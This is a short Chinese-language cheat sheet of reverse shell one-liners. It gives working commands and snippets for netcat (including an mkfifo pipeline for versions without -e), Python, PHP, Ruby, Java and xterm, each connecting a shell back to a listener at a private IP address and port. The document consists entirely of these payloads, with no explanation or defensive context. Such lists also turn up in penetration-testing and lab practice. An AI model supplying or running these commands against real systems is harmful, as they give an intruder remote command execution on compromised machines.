反弹shell
nc反弹
nc -e /bin/sh 192.168.10.128 6666
#但某些版本的nc没有-e参数(非传统版),则可使用以下方式解决
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.10.128 6666 >/tmp/f
python反弹
import socket,subprocess,os
s =socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(( "192.168.10.128" , 6666 ))
os.dup2(s.fileno(), 0 )
os.dup2(s.fileno(), 1 )
os.dup2(s.fileno(), 2 )
p = subprocess.call([ "/bin/bash" , "-i" ])
php反弹shell
php -r '$sock=fsockopen("192.168.2.130",4444);exec("/bin/sh -i <&3 >&3 2>&3");'
ruby反弹shell
ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i
<&%d >&%d 2>&%d",f,f,f)'
java反弹shell
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read
line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()
xterm反弹shell
xterm -display 10.0.0.1:1